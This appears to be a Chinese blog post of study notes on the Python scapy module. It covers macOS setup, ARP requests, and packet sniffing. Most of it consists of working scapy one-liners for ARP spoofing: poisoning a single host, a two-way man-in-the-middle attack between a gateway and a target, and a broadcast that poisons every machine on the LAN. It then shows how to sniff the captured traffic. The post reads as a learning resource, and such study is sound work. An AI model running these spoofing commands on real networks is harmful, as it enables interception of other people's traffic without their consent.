scapy 模块研究

2019-01-17  本文已影响17人  小码码

问题一:Mac平台scapy安装遇到的坑——找不到/dev/pbf*

正确的方法是先去看看/dev文件夹下是否有bpf文件,也许是bpf1、bpf2等,然后
sudo chgrp admin /dev/bpf*
sudo chmod g+rw /dev/bpf*
然后就可以了,猜测估计是权限不足导致读取不到。

arp 报文字段说明

发送arp请求报文

res=sr1(ARP(pdst="192.168.1.101"))   #查询192.168.1.101的MAC地址
res.hwsrc      #ac:c1:ee:31:1b:e6  源主机的mac地址
res.hwdst     # 目的主机的 mac 地址

发送arp响应报文

send(ARP(pdst="192.168.1.101",op=2)) 主动通知101主机当前机器的ip和MAC地址   op=2表示arp 是应答报文

srloop(ARP(psrc="192.168.1.101",hwsrc="11:22:33:44:55:66",pdst="192.168.1.1",op=2))  主动告知192.168.1.1   192.168.1.101的MAC地址是11:22:33:44:55:66,并循环发送。如果该mac地址是虚假的,就达到欺骗的目的

双向欺骗

场景:当前路由器的ip地址是192.168.1.1,MAC地址是24:69:68:49:67:e0
  本机ip是192.168.1.106,MAC地址是e0:94:67:79:17:2e
  目标机器ip是192.168.1.101,MAC地址是ac:c1:ee:31:1b:e6

srploop(Ether(dst="ac:c1:ee:31:1b:e6")/ARP(psrc="192.168.1.1",hwsrc="e0:94:67:79:17:2e",pdst="192.168.1.101",hwdst="ac:c1:ee:31:1b:e6",op=2))  将路由器的mac地址改成本机的,欺骗101主机本机是网关。 
srploop(Ether(dst="24:69:68:49:67:e0")/ARP(psrc="192.168.1.101",hwsrc="e0:94:67:79:17:2e",pdst="192.168.1.1",hwdst="24:69:68:49:67:e0",op=2)) 将101主机的mac地址改成本机的,欺骗网关本机是101主机 

欺骗局域网所有机器

srploop(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(hwsrc="00:e0:70:52:54:26",psrc="192.168.200.1",op=2))   #主动告诉局域网的所有机器,192.168.200.1的mac地址是00:e0:70:52:54:26,如果该MAC地址是虚假的,就存在欺骗

sniff的使用

data = sniff()    #打开sniff抓包
data.show()      #查看抓包列表
data[0].show() #查看第一条详细信息

arp 欺骗资料链接:https://blog.csdn.net/cracker_zhou/article/details/54864252

arp 基本使用:https://www.wengbi.com/thread_91366_1.html

sniff的使用:https://blog.csdn.net/qq_41884756/article/details/81255092

上一篇下一篇

猜你喜欢

热点阅读